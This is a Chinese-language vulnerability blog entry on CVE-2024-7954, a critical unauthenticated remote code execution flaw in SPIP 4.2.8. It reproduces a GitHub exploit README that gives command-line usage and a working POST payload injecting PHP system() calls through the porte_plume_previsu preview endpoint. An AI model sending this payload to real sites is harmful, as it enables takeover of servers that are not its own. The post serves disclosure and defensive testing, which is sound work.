SPIP 428 Remote Command Execution (RCE) Vulnerability

漏洞信息

漏洞名称: SPIP 4.2.8 Remote Command Execution (RCE) Vulnerability

漏洞编号:

  • CVE: CVE-2024-7954

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: SPIP是一个流行的内容管理系统(CMS),广泛用于构建和管理网站。它提供了一个用户友好的界面和丰富的功能,适用于各种规模的网站。SPIP 4.2.8版本中的porte_plume_previsu端点存在一个远程代码执行(RCE)漏洞。该漏洞允许未经认证的攻击者通过预览渲染精心构造的图像标签来注入PHP代码。漏洞的技术根源在于对用户输入的不当验证,导致攻击者可以执行任意系统命令。这种漏洞的严重性在于它允许攻击者完全控制受影响的系统,执行任意代码,可能导致数据泄露、服务中断或其他恶意活动。由于攻击不需要认证,且可以自动化利用,因此该漏洞对使用SPIP 4.2.8的网站构成了严重威胁。

产品厂商: SPIP

产品名称: SPIP CMS

影响版本: 4.2.8

来源: https://github.com/r0otk3r/CVE-2024-7954

类型: CVE-2024:github search

仓库文件

  • README.md

来源概述

CVE-2024-7954 - SPIP 4.2.8 Remote Command Execution (RCE) Exploit

This tool exploits a Remote Code Execution vulnerability in SPIP version 4.2.8 via the porte_plume_previsu endpoint. The vulnerability allows unauthenticated attackers to inject PHP code through preview rendering of crafted image tags.

CVE ID: CVE-2024-7954
Component: SPIP CMS (porte_plume_previsu)
Impact: Unauthenticated Remote Command Execution
Severity: Critical

Exploit Capabilities

  • Execute arbitrary system commands
  • Retrieve live command output
  • Automatically extract and display IP geolocation info
  • Proxy support (Burp/ZAP or other)

Usage

1
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd <COMMAND> [--proxy <IP:PORT>]
Example:
1
python3 cve_2024_7954_rce.py --url "http://192.168.1.10:7001" --cmd "whoami" --proxy "127.0.0.1:8080"

who

Burp Suite Exploit Request/Response:

bwho

1
2
```bash
python3 cve_2024_7954_rce.py --url "http://192.168.1.10:7001" --cmd "id" --proxy "127.0.0.1:8080"

id

Burp Suite Exploit Request/Response:

bid

1
2
```bash
python3 cve_2024_7954_rce.py --url "http://192.168.1.10:7001" --cmd "uname -a" --proxy "127.0.0.1:8080"

uname

Burp Suite Exploit Request/Response:

b uname

Exploit Payload (POST)
```html
POST /index.php?action=porte_plume_previsu HTTP/1.1
Content-Type: application/x-www-form-urlencoded

data=AA_[<img>->URL`<?php system('command'); ?>`]_BB

⚠️ Disclaimer

This tool is for educational and authorized security testing only. Unauthorized use is illegal and unethical.

Github Poc
#命令执行 #CVE-2024:github search
SPIP 428 Remote Command Execution (RCE) Vulnerability
http://example.com/2025/07/08/github_3675281231/
作者
lianccc
发布于
2025年7月8日
许可协议